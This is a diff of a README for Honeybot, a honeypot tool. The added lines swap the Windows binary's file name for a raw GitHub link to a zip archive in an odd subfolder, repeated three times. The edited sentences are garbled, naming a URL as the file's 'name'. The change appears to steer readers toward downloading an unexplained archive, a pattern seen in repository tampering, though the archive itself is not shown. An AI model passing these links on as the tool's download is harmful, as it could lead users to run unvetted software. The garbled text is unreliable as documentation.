adamthapa21/Honeybot/README.md

 - A second explicit reference to the same link appears in the Downloads/Downloads section to guide users to grab the appropriate binary and start using Honeybot.

 Note on file name convention
-- The Windows port binary is typically named Honeybot-Windows-Port-Portable.exe (or a variant that includes the version, such as Honeybot-Windows-Port-Portable-vX.Y.Z.exe).
+- The Windows port binary is typically named https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip (or a variant that includes the version, such as https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip).
 When you download the file from the Releases page, verify the name to ensure you are running the intended version.
-- If you need to reference the file in your notes or automated scripts, you can assume a file name similar to Honeybot-Windows-Port-Portable.exe for guidance and adjust for the actual version in your environment.
+- If you need to reference the file in your notes or automated scripts, you can assume a file name similar to https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip for guidance and adjust for the actual version in your environment.

 Final thoughts
 - Honeybot stands as a practical, approachable tool for examining how networks are probed and how services respond to basic interactions.
 Its minimalism aids clarity, while its multi-port listening capability provides a broad canvas for observation.
 The project favors straightforward setup, dependable operation, and clear, structured data output to support analysis and learning.